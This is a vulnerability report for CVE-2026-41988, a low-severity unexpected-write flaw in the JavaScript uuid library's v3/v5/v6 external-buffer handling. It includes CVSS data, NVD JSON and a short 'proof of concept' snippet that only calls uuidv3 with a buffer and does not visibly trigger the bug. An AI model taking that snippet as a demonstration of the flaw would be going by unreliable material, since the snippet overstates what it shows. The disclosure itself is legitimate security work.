Security Vulnerability Report
CVE-2026-41988 CVSS 3.2 LOW

Published: 2026-04-23 05:16:06
Last Modified: 2026-04-24 14:50:56

Description

uuid before 14.0.0 can make unexpected writes when external output buffers are used, and the UUID version is 3, 5, or 6. In particular, UUID version 4, which is very commonly used, is unaffected by this issue.

CVSS Details

CVSS Score: 3.2
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

uuid < 14.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
const { v3: uuidv3 } = require('uuid');

// Vulnerable scenario: using an external buffer with version 3, 5, or 6
// Create a buffer to simulate the output target
const buffer = Buffer.alloc(16);

try {
  // Define namespace and name for v3 generation
  const MY_NAMESPACE = '1b671a64-40d5-491e-99b0-da01ff1f3341';
  const name = 'example.com';

  // Trigger the vulnerable function
  // In uuid < 14.0.0, passing an external buffer for v3/v5/v6
  // may lead to unexpected memory writes.
  const id = uuidv3(name, MY_NAMESPACE, buffer);
  console.log('Generated UUID:', id);
} catch (e) {
  console.error('Potential crash or error:', e);
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41988", "sourceIdentifier": "[email protected]", "published": "2026-04-23T05:16:05.613", "lastModified": "2026-04-24T14:50:56.203", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "uuid before 14.0.0 can make unexpected writes when external output buffers are used, and the UUID version is 3, 5, or 6. In particular, UUID version 4, which is very commonly used, is unaffected by this issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:L/A:N", "baseScore": 3.2, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.4, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-670"}]}], "references": [{"url": "https://github.com/uuidjs/uuid/commit/3d2c5b0342f0fcb52a5ac681c3d47c13e7444b34", "source": "[email protected]"}, {"url": "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq", "source": "[email protected]"}, {"url": "https://github.com/uuidjs/uuid/security/advisories/GHSA-w5hq-g745-h8pq", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}